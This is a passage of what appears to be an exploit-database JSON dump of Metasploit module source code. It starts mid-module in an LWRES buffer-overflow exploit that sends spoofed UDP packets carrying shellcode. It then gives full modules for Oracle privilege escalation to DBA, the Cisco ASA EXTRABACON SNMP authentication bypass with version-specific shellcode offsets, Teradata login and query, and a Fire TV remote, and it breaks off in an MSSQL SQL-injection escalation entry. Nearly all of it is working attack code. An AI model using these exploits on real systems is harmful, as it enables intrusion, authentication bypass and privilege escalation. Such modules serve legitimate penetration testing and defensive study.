pop/mov/pop/ret in packet\r\n\t\t\t\t\t\t\t# 0x61B4121B = pop/pop/ret in pcre3\r\n\t\t\t\t\t\t\t'RetOff' => 2128,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Jan 27 2010',\r\n\t\t\t# Set it to passive mode to background it.\r\n\t\t\t'Stance' => Msf::Exploit::Stance::Passive))\r\n\r\n\t\tregister_options([\r\n\t\t\tOpt::RPORT(921),\r\n\t\t\tOpt::RHOST(\"239.255.255.250\"),\r\n\t\t\tOptAddress.new(\t'SHOST', [false, 'This option can be used to specify a spoofed source address', nil]),\r\n\t\t\tOptInt.new(\t\t'DELAY', [true, 'This option sets the delay between sent packets', 5])\r\n\t\t], self.class)\r\n\r\n\t\tregister_advanced_options([\r\n\t\t\tOptBool.new(\"ExitOnSession\", [ false, \"Return from the exploit after a session has been created\", true ])\r\n\t\t], self.class)\r\n\r\n\t\tderegister_options('FILTER','PCAPFILE')\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\tret_offset = target['RetOff']\r\n\r\n\t\t# we have different techniques depending on the target\r\n\t\tif (target == targets[0])\r\n\t\t\t# debian tshark\r\n\t\t\tstr = make_nops(ret_offset - payload.encoded.length - 16)\r\n\t\t\tstr << payload.encoded\r\n\t\t\tstr << [target['GotAddr'] - 0xc].pack('V')\r\n\t\t\tstr << rand_text(4)\r\n\t\t\tstr << [target['Readable']].pack('V')\r\n\t\t\tstr << rand_text(4)\r\n\t\t\t# ret is next\r\n\t\telsif (target == targets[1])\r\n\t\t\tfix_esp = Metasm::Shellcode.assemble(Metasm::Ia32.new, \"add esp,-3500\").encode_string\r\n\t\t\tstr = make_nops(ret_offset - fix_esp.length - payload.encoded.length)\r\n\t\t\tstr << fix_esp\r\n\t\t\tstr << payload.encoded\r\n\t\t\t# jmp esp...\r\n\t\t\tstr << [target.ret].pack('V')\r\n\t\t\t# jump back\r\n\t\t\tdistance = ret_offset + 4\r\n\t\t\tstr << Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-\" + distance.to_s).encode_string\r\n\t\telsif (target == targets[4])\r\n\t\t\t# ugh, /GS and UDP length issues :-/\r\n\t\t\tstr = make_nops(ret_offset - payload.encoded.length)\r\n\t\t\tstr << payload.encoded\r\n\t\t\tstr << generate_seh_record(target.ret)\r\n\t\t\t# jump back\r\n\t\t\tdistance = ret_offset + 8\r\n\t\t\tstr << Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-\" + distance.to_s).encode_string\r\n\t\telse\r\n\t\t\t# this is just a simple DoS payload\r\n\t\t\tstr = Rex::Text.pattern_create(ret_offset)\r\n\t\t\t#str << Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $+6\").encode_string\r\n\t\tend\r\n\r\n\t\t# add return address\r\n\t\t#XXX: this isn't working?\r\n\t\t#str << Rex::Arch.pack_addr(target.arch, target.ret)\r\n\t\tstr << [target.ret].pack('V')\r\n\r\n\t\t# form the packet's payload!\r\n\t\tsploit = \"\\x00\\x00\\x01\\x5d\\x00\\x00\\x00\\x00\\x4b\\x49\\x1c\\x52\\x00\\x01\\x00\\x01\"\r\n\t\tsploit << \"\\x00\\x00\\x00\\x00\\x00\\x00\\x40\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\t\tsploit << \"\\x00\\x00\\x00\\x01\"\r\n\t\tsploit << [str.length].pack('n')\r\n\t\tsploit << str\r\n\t\tsploit << \"\\x00\\x00\"\r\n\r\n\t\tshost = datastore['SHOST']\r\n\t\tif (shost)\r\n\t\t\tprint_status(\"Sending malformed LWRES packet to #{rhost} (spoofed from #{shost})\")\r\n\t\t\topen_pcap\r\n\r\n\t\t\tn = Racket::Racket.new\r\n\r\n\t\t\tn.l3 = Racket::L3::IPv4.new\r\n\t\t\tn.l3.src_ip = datastore['SHOST'] || Rex::Socket.source_address(rhost)\r\n\t\t\tn.l3.dst_ip = rhost\r\n\t\t\tn.l3.protocol = 6\r\n\t\t\tn.l3.id = rand(0x10000)\r\n\t\t\tn.l3.ttl = 64\r\n\r\n\t\t\tn.l4 = Racket::L4::UDP.new\r\n\t\t\tn.l4.src_port = rand((2**16)-1024)+1024\r\n\t\t\tn.l4.dst_port = datastore['RPORT'].to_i\r\n\r\n\t\t\tn.l4.payload = sploit\r\n\r\n\t\t\tn.l4.fix!(n.l3.src_ip, n.l3.dst_ip)\r\n\t\t\tpkt = n.pack\r\n\r\n\t\t\twhile true\r\n\t\t\t\tbreak if session_created? and datastore['ExitOnSession']\r\n\t\t\t\tcapture_sendto(pkt, rhost)\r\n\t\t\t\tsleep(datastore['DELAY'])\r\n\t\t\tend\r\n\t\t\t\r\n\t\t\tclose_pcap\r\n\r\n\t\t\thandler\r\n\t\telse\r\n\t\t\tprint_status(\"Sending malformed LWRES packet to #{rhost} every #{datastore['DELAY']} seconds.\")\r\n\r\n\t\t\thandler\r\n\r\n\t\t\twhile true\r\n\t\t\t\tbreak if session_created? and datastore['ExitOnSession']\r\n\t\t\t\tconnect_udp\r\n\t\t\t\tudp_sock.put(sploit)\r\n\t\t\t\tdisconnect_udp\r\n\t\t\t\tsleep(datastore['DELAY'])\r\n\t\t\tend\r\n\t\tend\r\n\r\n\tend\r\n\r\nend\r\n\r\n\r\n\r\n\n# 0day.today [2018-02-06] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "37e5d5b6ac3ce6fb6d3a6ab0f49b2bf0", "key": "description"}, {"hash": "3c6a8d7871a26d25fc3baf3434df41d3", "key": "href"}, {"hash": "a3442b0c614e2cc43f38512f5354391a", "key": "modified"}, {"hash": "a3442b0c614e2cc43f38512f5354391a", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "5b307381861d9a4c51b0e881eef973d3", "key": "reporter"}, {"hash": "5c332f906abeecc92a7bcff7e9d88720", "key": "sourceData"}, {"hash": "eb5bd49a56945770ae0d7eee92cc7daf", "key": "sourceHref"}, {"hash": "6699589a2999644ec5b9bbfe07255d3c", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
{"metasploit": [{"lastseen": "2019-11-28T14:42:14", "bulletinFamily": "exploit", "description": "SQL query module for ODBC connections to local Teradata databases. Port specification (TCP 1025 by default) is not necessary for ODBC connections. Requires ODBC driver and Python Teradata module.\n", "modified": "2018-09-13T18:09:01", "published": "2018-05-29T15:12:43", "id": "MSF:AUXILIARY/ADMIN/TERADATA/TERADATA_ODBC_SQL", "href": "", "type": "metasploit", "title": "Teradata ODBC SQL Query Module", "sourceData": "#!/usr/bin/env python2.7\n# -*- coding: utf-8 -*-\n#2018-05-09 14-15\n\n# Standard Modules\nimport logging\n\n# Extra Modules\ndependencies_missing = False\ntry:\n import teradata\nexcept ImportError:\n dependencies_missing = True\n\nfrom metasploit import module\n\n\n# Metasploit Metadata\nmetadata = {\n 'name': 'Teradata ODBC SQL Query Module',\n 'description': '''\n SQL query module for ODBC connections to local Teradata databases.\n\n Port specification (TCP 1025 by default) is not necessary for ODBC connections.\n\n Requires ODBC driver and Python Teradata module.\n ''',\n 'authors': [\n 'Ted Raffle (actuated)'\n ],\n 'date': '2018-03-29',\n 'license': 'MSF_LICENSE',\n 'references': [\n {'type': 'url', 'ref': 'https://developer.teradata.com/tools/reference/teradata-python-module'},\n {'type': 'url', 'ref': 'https://downloads.teradata.com/download/connectivity/odbc-driver/linux'}\n ],\n 'type': 'single_scanner',\n 'options': {\n 'rhost': {'type': 'address', 'description': 'Host to target', 'required': True},\n 'rport': {'type': 'port', 'description': 'Port to target, ignored by the ODBC driver', 'required': True, 'default': 1025},\n 'username': {'type': 'string', 'description': 'Username', 'required': True, 'default': 'dbc'},\n 'password': {'type': 'string', 'description': 'Password', 'required': True, 'default': 'dbc'},\n 'sql': {'type': 'string', 'description': 'SQL query to perform', 'required': True, 'default': 'SELECT DATABASENAME FROM DBC.DATABASES'},\n },\n 'notes': {\n 'AKA': ['Teradata ODBC Authentication Scanner']\n }\n}\n\n\n# Run function\ndef run(args):\n\n # Define UdaExec ODBC connection \"application\", must be before LogHandler\n udaExec = teradata.UdaExec(appName=\"Auth\", version=\"1.0\", logConsole=False, configureLogging=False)\n\n # Metasploit LogHandler\n module.LogHandler.setup(msg_prefix='{} - '.format(args['rhost']))\n\n # Return error for missing dependency\n if dependencies_missing:\n logging.error('Python Teradata module missing, cannot continue')\n return\n\n # Set variables to current RHOST, and USERNAME and PASSWORD options\n host = args['rhost']\n user = args['username']\n password = args['password']\n\n # Perform login attempt\n module.log(host + ' - ' + user + ':' + password + ' - Starting')\n try:\n session = udaExec.connect(method=\"odbc\", system=host, username=user, password=password);\n except teradata.api.Error as e:\n logging.error(user + ':' + password + ' - ' + format(e))\n return\n else:\n module.log(host + ' - ' + user + ':' + password + ' - Login Successful', level='good')\n try:\n query = args['sql']\n module.log(host + ' - Starting - ' + query)\n for row in session.execute(query):\n outputRow=str(row)\n module.log(host + ' - ' + outputRow, level='good')\n except teradata.api.Error as e:\n logging.error(format(e))\n return\n\n\nif __name__ == '__main__':\n module.run(metadata, run)\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/teradata/teradata_odbc_sql.py"}, {"lastseen": "2019-11-21T16:32:13", "bulletinFamily": "exploit", "description": "This module will escalate an Oracle DB user to DBA by creating a function-based index on a table owned by a more-privileged user. Credits to David Litchfield for publishing the technique.\n", "modified": "2018-12-10T17:21:16", "published": "2017-08-07T03:07:46", "id": "MSF:AUXILIARY/ADMIN/ORACLE/ORACLE_INDEX_PRIVESC", "href": "", "type": "metasploit", "title": "Oracle DB Privilege Escalation via Function-Based Index", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n\n include Msf::Exploit::ORACLE\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Oracle DB Privilege Escalation via Function-Based Index',\n 'Description' => %q{\n This module will escalate an Oracle DB user to DBA by creating a\n function-based index on a table owned by a more-privileged user.\n Credits to David Litchfield for publishing the technique.\n },\n 'Author' =>\n [\n 'David Litchfield', # Vulnerability discovery and exploit\n 'Moshe Kaplan', # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'URL', 'http://www.davidlitchfield.com/Privilege_Escalation_via_Oracle_Indexes.pdf' ],\n ],\n 'DisclosureDate' => 'Jan 21 2015'))\n\n register_options(\n [\n OptString.new('SQL', [ true, 'SQL to execute.', \"GRANT DBA to #{datastore['DBUSER']}\" ]),\n OptString.new('TABLE', [ true, 'Table to create the index on.', 'SYS.DUAL' ]),\n ])\n end\n\n def run\n return unless check_dependencies\n\n func_name = Rex::Text.rand_text_alpha(6..10)\n\n create_function = <<-EOF\n CREATE OR REPLACE FUNCTION #{func_name}\n (FOO varchar) return varchar\n deterministic authid current_user is\n pragma autonomous_transaction;\n begin\n execute immediate '#{datastore['SQL'].gsub(\"'\", \"\\\\\\\\'\")}';\n commit;\n return '';\n end;\n EOF\n\n index_name = Rex::Text.rand_text_alpha(6..10)\n param_value = Rex::Text.rand_text_alpha(2..6)\n\n create_index = \"CREATE INDEX #{index_name} ON \" \\\n \"#{datastore['TABLE']}(#{datastore['DBUSER']}.#{func_name}('#{param_value}'))\"\n\n trigger = \"SELECT * FROM #{datastore['TABLE']}\"\n\n clean_index = \"drop index #{index_name}\"\n clean_func = \"drop function #{func_name}\"\n\n print_status('Running exploit...')\n\n begin\n print_status(\"Attempting to create function #{func_name}...\")\n prepare_exec(create_function)\n print_status(\"Attempting to create index #{index_name}...\")\n prepare_exec(create_index)\n print_status('Querying to trigger function...')\n prepare_exec(trigger)\n print_status('Cleaning up index...')\n prepare_exec(clean_index)\n print_status('Cleaning up function...')\n prepare_exec(clean_func)\n print_status('Exploit complete!')\n rescue ::OCIError => e\n print_error(\"Error! #{e.message}\")\n end\n end\n\n def prepare_exec(query)\n print_status(query)\n super\n end\n\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/oracle/oracle_index_privesc.rb"}, {"lastseen": "2019-11-24T21:38:54", "bulletinFamily": "exploit", "description": "This module patches the authentication functions of a Cisco ASA to allow uncredentialed logins. Uses improved shellcode for payload.\n", "modified": "2017-07-24T13:26:21", "published": "2016-09-22T21:24:49", "id": "MSF:AUXILIARY/ADMIN/CISCO/CISCO_ASA_EXTRABACON", "href": "", "type": "metasploit", "title": "Cisco ASA Authentication Bypass (EXTRABACON)", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::SNMPClient\n include Msf::Auxiliary::Cisco\n\n def initialize\n super(\n 'Name' => 'Cisco ASA Authentication Bypass (EXTRABACON)',\n 'Description' => %q{\n This module patches the authentication functions of a Cisco ASA\n to allow uncredentialed logins. Uses improved shellcode for payload.\n },\n 'Author' =>\n [\n 'Sean Dillon <sean.dillon@risksense.com>',\n 'Zachary Harding <zachary.harding@risksense.com>',\n 'Nate Caroe <nate.caroe@risksense.com>',\n 'Dylan Davis <dylan.davis@risksense.com>',\n 'William Webb <william_webb[at]rapid7.com>', # initial module and ASA hacking notes\n 'Jeff Jarmoc <jjarmoc>', # minor improvements\n 'Equation Group',\n 'Shadow Brokers'\n ],\n 'References' =>\n [\n [ 'CVE', '2016-6366'],\n [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160817-asa-snmp'],\n [ 'URL', 'https://github.com/RiskSense-Ops/CVE-2016-6366'],\n ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n ['PASS_DISABLE', {'Description' => 'Disable password authentication.'} ],\n ['PASS_ENABLE', {'Description' => 'Enable password authentication.'} ]\n ],\n 'DefaultAction' => 'PASS_DISABLE'\n )\n\n @offsets = version_offsets()\n\n register_options([\n OptEnum.new('ASAVER', [ false, 'Target ASA version (default autodetect)', 'auto', ['auto']+@offsets.keys]),\n ])\n\n deregister_options(\"VERSION\")\n datastore['VERSION'] = '2c' # SNMP v. 2c required it seems\n end\n\n def version_offsets()\n # Payload offsets for supported ASA versions.\n # See https://github.com/RiskSense-Ops/CVE-2016-6366\n return {\n \"9.2(4)13\" => [\"197.207.10.8\", \"70.97.40.9\", \"72\", \"0.16.185.9\", \"240.30.185.9\", \"85.49.192.137\", \"0.80.8.8\", \"240.95.8.8\", \"85.137.229.87\"],\n \"9.2(4)\" => [\"101.190.10.8\", \"54.209.39.9\", \"72\", \"0.48.184.9\", \"192.52.184.9\", \"85.49.192.137\", \"0.80.8.8\", \"0.91.8.8\", \"85.137.229.87\"],\n \"9.2(3)\" => [\"29.112.29.8\", # jmp_esp_offset, 0\n \"134.115.39.9\", # saferet_offset, 1\n \"72\", # fix_ebp, 2\n \"0.128.183.9\", # pmcheck_bounds, 3\n \"16.128.183.9\", # pmcheck_offset, 4\n \"85.49.192.137\", # pmcheck_code, 5\n \"0.80.8.8\", # admauth_bounds, 6\n \"64.90.8.8\", # admauth_offset, 7\n \"85.137.229.87\"], # admauth_code, 8\n \"9.2(2)8\" => [\"21.187.10.8\", \"54.245.39.9\", \"72\", \"0.240.183.9\", \"16.252.183.9\", \"85.49.192.137\", \"0.80.8.8\", \"64.90.8.8\", \"85.137.229.87\"],\n \"9.2(1)\" => [\"197.180.10.8\", \"54.118.39.9\", \"72\", \"0.240.182.9\", \"16.252.182.9\", \"85.49.192.137\", \"0.80.8.8\", \"176.84.8.8\", \"85.137.229.87\"],\n \"9.1(1)4\" => [\"173.250.27.8\", \"134.177.3.9\", \"72\", \"0.112.127.9\", \"176.119.127.9\", \"85.49.192.137\", \"0.48.8.8\", \"96.49.8.8\", \"85.137.229.87\"],\n \"9.0(1)\" => [\"221.227.27.8\", \"134.13.3.9\", \"72\", \"0.176.126.9\", \"112.182.126.9\", \"85.49.192.137\", \"0.32.8.8\", \"240.45.8.8\", \"85.137.229.87\"],\n \"8.4(7)\" => [\"109.22.18.8\", \"70.254.226.8\", \"72\", \"0.144.87.9\", \"80.156.87.9\", \"85.49.192.137\", \"0.32.8.8\", \"0.34.8.8\", \"85.137.229.87\"],\n \"8.4(6)5\" => [\"125.63.32.8\", \"166.11.228.8\", \"72\", \"0.176.88.9\", \"96.186.88.9\", \"85.49.192.137\", \"0.32.8.8\", \"240.33.8.8\", \"85.137.229.87\"],\n \"8.4(4)9\" => [\"173.23.5.8\", \"166.113.226.8\", \"72\", \"0.144.86.9\", \"224.154.86.9\", \"85.49.192.137\", \"0.16.8.8\", \"160.27.8.8\", \"85.137.229.87\"],\n \"8.4(4)5\" => [\"202.250.13.8\", \"246.48.226.8\", \"72\", \"0.64.86.9\", \"16.69.86.9\", \"85.49.192.137\", \"0.16.8.8\", \"160.27.8.8\", \"85.137.229.87\"],\n \"8.4(4)3\" => [\"164.119.8.8\", \"102.0.226.8\", \"72\", \"0.240.85.9\", \"96.252.85.9\", \"85.49.192.137\", \"0.16.8.8\", \"160.27.8.8\", \"85.137.229.87\"],\n \"8.4(4)1\" => [\"253.74.114.8\", \"150.236.225.8\", \"72\", \"0.192.85.9\", \"176.202.85.9\", \"85.49.192.137\", \"0.16.8.8\", \"176.27.8.8\", \"85.137.229.87\"],\n \"8.4(4)\" => [\"111.198.161.9\", \"181.105.226.8\", \"72\", \"0.192.85.9\", \"240.201.85.9\", \"85.49.192.137\", \"0.16.8.8\", \"176.27.8.8\", \"85.137.229.87\"],\n \"8.4(3)\" => [\"13.178.7.8\", \"150.219.224.8\", \"72\", \"0.192.84.9\", \"208.207.84.9\", \"85.49.192.137\", \"0.16.8.8\", \"208.23.8.8\", \"85.137.229.87\"],\n \"8.4(2)\" => [\"25.71.20.9\", \"230.222.223.8\", \"72\", \"0.128.83.9\", \"240.143.83.9\", \"85.49.192.137\", \"0.16.8.8\", \"224.19.8.8\", \"85.137.229.87\"],\n \"8.4(1)\" => [\"173.58.17.9\", \"6.12.219.8\", \"72\", \"0.240.72.9\", \"240.252.72.9\", \"85.49.192.137\", \"0.48.8.8\", \"144.56.8.8\", \"85.137.229.87\"],\n \"8.3(2)40\" => [\"169.151.13.8\", \"124.48.196.8\", \"88\", \"0.128.59.9\", \"48.137.59.9\", \"85.49.192.137\", \"0.224.6.8\", \"32.228.6.8\", \"85.137.229.87\"],\n \"8.3(2)39\" => [\"143.212.14.8\", \"124.48.196.8\", \"88\", \"0.128.59.9\", \"176.136.59.9\", \"85.49.192.137\", \"0.224.6.8\", \"32.228.6.8\", \"85.137.229.87\"],\n \"8.3(2)\" => [\"220.203.69.9\", \"252.36.195.8\", \"88\", \"0.80.54.9\", \"144.84.54.9\", \"85.49.192.137\", \"0.208.6.8\", \"16.222.6.8\", \"85.137.229.87\"],\n #\"8.3(2)-npe\" => [\"125.116.12.8\", \"76.34.195.8\", \"88\", \"0.80.54.9\", \"224.81.54.9\", \"85.49.192.137\", \"0.208.6.8\", \"16.222.6.8\", \"85.137.229.87\"],\n \"8.3(1)\" => [\"111.187.14.8\", \"140.140.194.8\", \"88\", \"0.112.53.9\", \"240.119.53.9\", \"85.49.192.137\", \"0.208.6.8\", \"48.221.6.8\", \"85.137.229.87\"],\n \"8.2(5)41\" => [\"77.90.18.8\", \"188.9.187.8\", \"88\", \"0.160.50.9\", \"16.168.50.9\", \"85.49.192.137\", \"0.240.6.8\", \"16.243.6.8\", \"85.137.229.87\"],\n \"8.2(5)33\" => [\"157.218.29.8\", \"236.190.186.8\", \"88\", \"0.80.50.9\", \"96.92.50.9\", \"85.49.192.137\", \"0.240.6.8\", \"192.242.6.8\", \"85.137.229.87\"],\n \"8.2(5)\" => [\"253.13.54.9\", \"156.229.185.8\", \"88\", \"0.16.48.9\", \"96.28.48.9\", \"85.49.192.137\", \"0.240.6.8\", \"64.242.6.8\", \"85.137.229.87\"],\n \"8.2(4)\" => [\"93.172.49.9\", \"236.91.185.8\", \"88\", \"0.176.43.9\", \"96.187.43.9\", \"85.49.192.137\", \"0.240.6.8\", \"16.242.6.8\", \"85.137.229.87\"],\n \"8.2(3)\" => [\"45.0.7.8\", \"252.42.185.8\", \"88\", \"0.96.43.9\", \"128.111.43.9\", \"85.49.192.137\", \"0.240.6.8\", \"144.241.6.8\", \"85.137.229.87\"],\n \"8.2(2)\" => [\"150.54.28.9\", \"124.0.184.8\", \"88\", \"0.224.41.9\", \"32.227.41.9\", \"85.49.192.137\", \"0.208.6.8\", \"64.221.6.8\", \"85.137.229.87\"],\n \"8.2(1)\" => [\"147.242.43.9\", \"108.154.181.8\", \"88\", \"0.0.36.9\", \"240.14.36.9\", \"85.49.192.137\", \"0.208.6.8\", \"16.215.6.8\", \"85.137.229.87\"],\n \"8.0(5)\" => [\"253.116.31.9\", \"204.64.171.8\", \"88\", \"0.32.24.9\", \"64.32.24.9\", \"85.49.192.137\", \"0.96.6.8\", \"128.107.6.8\", \"85.137.229.87\"],\n \"8.0(4)32\" => [\"157.6.31.9\", \"44.20.171.8\", \"88\", \"0.176.23.9\", \"0.176.23.9\", \"85.49.192.137\", \"0.96.6.8\", \"48.105.6.8\", \"85.137.229.87\"],\n \"8.0(4)\" => [\"109.188.26.9\", \"140.100.168.8\", \"88\", \"0.96.19.9\", \"128.101.19.9\", \"85.49.192.137\", \"0.96.6.8\", \"176.104.6.8\", \"85.137.229.87\"],\n \"8.0(3)6\" => [\"191.143.24.9\", \"28.158.161.8\", \"88\", \"0.0.11.9\", \"224.1.11.9\", \"85.49.192.137\", \"0.96.6.8\", \"112.101.6.8\", \"85.137.229.87\"],\n \"8.0(3)\" => [\"141.123.131.9\", \"156.138.160.8\", \"88\", \"0.128.9.9\", \"112.130.9.9\", \"85.49.192.137\", \"0.96.6.8\", \"176.96.6.8\", \"85.137.229.87\"],\n \"8.0(2)\" => [\"155.222.211.8\", \"44.103.159.8\", \"88\", \"0.224.6.9\", \"32.237.6.9\", \"85.49.192.137\", \"0.80.6.8\", \"48.90.6.8\", \"85.137.229.87\"]\n }\n end\n\n def check\n begin\n vers_string = get_asa_version()\n rescue ::Exception => e\n print_error(\"Error: Unable to retrieve version information\")\n return Exploit::CheckCode::Unknown\n end\n\n if @offsets[vers_string]\n print_good(\"Payload for Cisco ASA version #{vers_string} available!\")\n return Exploit::CheckCode::Appears\n end\n\n print_warning(\"Received Cisco ASA version #{vers_string}, but no payload available\")\n return Exploit::CheckCode::Detected\n end\n\n def build_payload(vers_string, mode)\n # adds offsets to the improved shellcode\n # https://github.com/RiskSense-Ops/CVE-2016-6366/blob/master/shellcode.nasm\n\n if mode == 'PASS_DISABLE'\n always_return_true = \"49.192.64.195\"\n pmcheck_bytes = always_return_true\n admauth_bytes = always_return_true\n else # PASS_ENABLE\n pmcheck_bytes = @offsets[vers_string][5]\n admauth_bytes = @offsets[vers_string][8]\n end\n\n preamble_snmp = \"\"\n preamble_snmp << \"49.219.49.246.49.201.49.192.96.49.210.128.197.16.128.194.7.4.125.80.187.\"\n preamble_snmp << @offsets[vers_string][3]\n preamble_snmp << \".205.128.88.187.\"\n preamble_snmp << @offsets[vers_string][6]\n preamble_snmp << \".205.128.199.5.\"\n preamble_snmp << @offsets[vers_string][4]\n preamble_snmp << \".\"\n preamble_snmp << pmcheck_bytes\n preamble_snmp << \".199.5.\"\n preamble_snmp << @offsets[vers_string][7]\n preamble_snmp << \".\"\n preamble_snmp << admauth_bytes\n preamble_snmp << \".97.104.\"\n preamble_snmp << @offsets[vers_string][1]\n preamble_snmp << \".128.195.16.191.11.15.15.15.137.229.131.197.\"\n preamble_snmp << @offsets[vers_string][2]\n preamble_snmp << \".195\"\n\n preamble_len = preamble_snmp.split('.').length\n preamble_snmp << \".144\" * (82 - preamble_len)\n\n # cufwUrlfServerStatus\n head = \"1.3.6.1.4.1.9.9.491.1.3.3.1.1.5\"\n head << \".9.95\"\n\n finder_snmp = \"139.124.36.20.139.7.255.224.144\"\n\n overflow = [head, preamble_snmp, @offsets[vers_string][0], finder_snmp].join(\".\")\n return overflow\n end\n\n def run()\n begin\n session = rand(255) + 1\n\n vers_string = get_asa_version()\n\n print_status(\"Building #{action.name} payload for version #{vers_string}...\")\n overflow = build_payload(vers_string, action.name)\n payload = SNMP::ObjectId.new(overflow)\n\n print_status(\"Sending SNMP payload...\")\n response = snmp.get_bulk(0, 1, [SNMP::VarBind.new(payload)])\n\n if response.varbind_list\n print_good(\"Clean return detected!\")\n if action.name == 'PASS_DISABLE'\n print_warning(\"Don't forget to run PASS_ENABLE after logging in!\")\n print_warning(\" set ACTION PASS_ENABLE\")\n end\n end\n\n rescue ::Rex::ConnectionError\n print_error(\"Connection Error: Is the target up?\")\n rescue ::SNMP::RequestTimeout\n print_error(\"SNMP Error: Request Timeout, Cisco ASA may have crashed :/\")\n rescue ::SNMP::UnsupportedVersion\n print_error(\"SNMP Error: Version 2c is not supported by target.\")\n rescue ::NoMethodError\n print_error(\"Error: No payload available for version #{vers_string}\")\n rescue ::Interrupt\n raise $!\n rescue ::Exception => e\n print_error(\"Error: #{e.class} #{e} #{e.backtrace}\")\n ensure\n disconnect_snmp\n end\n end\n\n def get_asa_version()\n return datastore['ASAVER'] unless (datastore['ASAVER'] == 'auto')\n vprint_status(\"Fingerprinting via SNMP...\")\n\n asa_version_oid = '1.3.6.1.2.1.47.1.1.1.1.10.1'\n mib2_sysdescr_oid = '1.3.6.1.2.1.1.1.0'\n\n snmp = connect_snmp\n ver = snmp.get_value(asa_version_oid).to_s\n vprint_status(\"OID #{asa_version_oid} yields #{ver}\")\n\n if (ver == \"noSuchInstance\")\n # asa_version_snmp OID isn't available on some models, fallback to MIB2 SysDescr\n ver = snmp.get_value(mib2_sysdescr_oid).rpartition(' ').last\n vprint_status(\"OID #{mib2_sysdescr_oid} yields #{ver}\")\n end\n\n ver\n end\nend\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/cisco/cisco_asa_extrabacon.rb"}, {"lastseen": "2019-11-27T19:22:14", "bulletinFamily": "exploit", "description": "This module acts as a simple remote control for the Amazon Fire TV's YouTube app. Tested on the Amazon Fire TV Stick.\n", "modified": "2017-07-24T13:26:21", "published": "2015-02-17T11:44:04", "id": "MSF:AUXILIARY/ADMIN/FIRETV/FIRETV_YOUTUBE", "href": "", "type": "metasploit", "title": "Amazon Fire TV YouTube Remote Control", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Amazon Fire TV YouTube Remote Control',\n 'Description' => %q{\n This module acts as a simple remote control for the Amazon Fire TV's\n YouTube app.\n\n Tested on the Amazon Fire TV Stick.\n },\n 'Author' => ['wvu'],\n 'References' => [\n ['URL', 'http://www.amazon.com/dp/B00CX5P8FC?_encoding=UTF8&showFS=1'],\n ['URL', 'http://www.amazon.com/dp/B00GDQ0RMG/ref=fs_ftvs']\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n ['Play', 'Description' => 'Play video'],\n ['Stop', 'Description' => 'Stop video']\n ],\n 'DefaultAction' => 'Play'\n ))\n\n register_options([\n Opt::RPORT(8008),\n OptString.new('VID', [true, 'Video ID', 'kxopViU98Xo'])\n ])\n end\n\n def run\n case action.name\n when 'Play'\n stop\n sleep(1)\n res = play\n when 'Stop'\n res = stop\n end\n\n return unless res\n\n case res.code\n when 201\n print_good(\"Playing https://www.youtube.com/watch?v=#{datastore['VID']}\")\n when 200\n print_status('Stopping video')\n when 404\n print_error(\"Couldn't #{action.name.downcase} video\")\n end\n end\n\n def play\n begin\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => '/apps/YouTube',\n 'ctype' => 'text/plain',\n 'vars_post' => {\n 'v' => datastore['VID']\n }\n )\n rescue Rex::ConnectionRefused, Rex::ConnectionTimeout,\n Rex::HostUnreachable => e\n fail_with(Failure::Unreachable, e)\n end\n end\n\n def stop\n begin\n send_request_raw(\n 'method' => 'DELETE',\n 'uri' => '/apps/YouTube/run'\n )\n rescue Rex::ConnectionRefused, Rex::ConnectionTimeout,\n Rex::HostUnreachable => e\n fail_with(Failure::Unreachable, e)\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/firetv/firetv_youtube.rb"}, {"lastseen": "2019-11-23T05:31:22", "bulletinFamily": "exploit", "description": "This module can be used escalate privileges if the IMPERSONATION privilege has been assigned to the user via error based SQL injection. In most cases, this results in additional data access, but in some cases it can be used to gain sysadmin privileges. The syntax for injection URLs is: /testing.asp?id=1+and+1=[SQLi];--\n", "modified": "2017-07-24T13:26:21", "published": "2014-11-12T15:26:47", "id": "MSF:AUXILIARY/ADMIN/MSSQL/MSSQL_ESCALATE_EXECUTE_AS_SQLI", "href": "", "type": "metasploit", "title": "Microsoft SQL Server SQLi Escalate Execute AS", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: 